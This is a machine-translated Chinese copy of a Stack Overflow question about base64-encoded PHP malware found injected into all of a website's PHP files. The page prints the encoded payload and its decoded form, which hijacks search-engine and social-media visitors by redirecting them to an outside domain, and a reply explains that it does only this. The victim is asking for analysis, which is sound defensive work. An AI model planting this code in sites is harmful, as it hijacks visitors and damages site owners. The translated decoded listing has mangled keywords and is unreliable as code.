我从这个恶意代码中丢失了多少钱?

时间:2012-03-03 12:21:24

标签: php malware

今年2月14日,我的网站受到了一些恶意软件代码的攻击,这些代码在2月29日谷歌行动之后引起了我的注意但是所有的php文件都受到了恶意代码的影响我在检查时得到了以下代码

  

回波   BASE64_DECODE(“DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw / KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNC mlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbmFtZXN0aS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9" );

解码后

变为

  

的error_reporting(0); $ qazplm = headers_sent(); if(!$ qazplm){       $ referer = $ _SERVER ['HTTP_REFERER'];       $ uag = $ _SERVER ['HTTP_USER_AGENT'];       if($ uag){           if(stristr($ referer,“yahoo”)或stristr($ referer,“bing”)或stristr($ referer,“rambler”)或stristr($ referer,“gogo”)或   stristr($ referer,“live.com”)或stristr($ referer,“aport”)或   stristr($ referer,“nigma”)或stristr($ referer,“webalta”)或   stristr($ referer,“beginning.ru”)或stristr($ referer,“stumbleupon.com”)   或stristr($ referer,“bit.ly”)或stristr($ referer,“tinyurl.com”)或   preg_match(“/ yandex.ru/yandsearch\?(.*?)\&lr\=/”,$ referer)或   preg_match(“/ google。(。*?)/ url /”,$ referer)或stristr($ referer,   “myspace.com”)或stristr($ referer,“facebook.com”)或   stristr($ referer,“aol.com”)){               if(!stristr($ referer,“cache”)或!stristr($ referer,“inurl”)){                   标题(“位置:http://namesti.bee.pl/”);                   出口();               }           }       }}

我不知道它是如何来到我的服务器但所有的PHP文件已经生效但其他人都很好。现在网站已经关闭。我只是想知道它可以做多少伤害以及这段代码究竟做了什么。我怎么能检测到它。它是在特定时间执行的脚本。

1 个答案:

答案 0 :(得分:4)

该脚本只是尝试重定向到namesti.bee.pl,具体取决于标头是否已经发送,以及referer字符串包含的内容。

它没有做任何其他事情,所以造成的伤害最重要的是对你网站的声誉。

相关问题
最新问题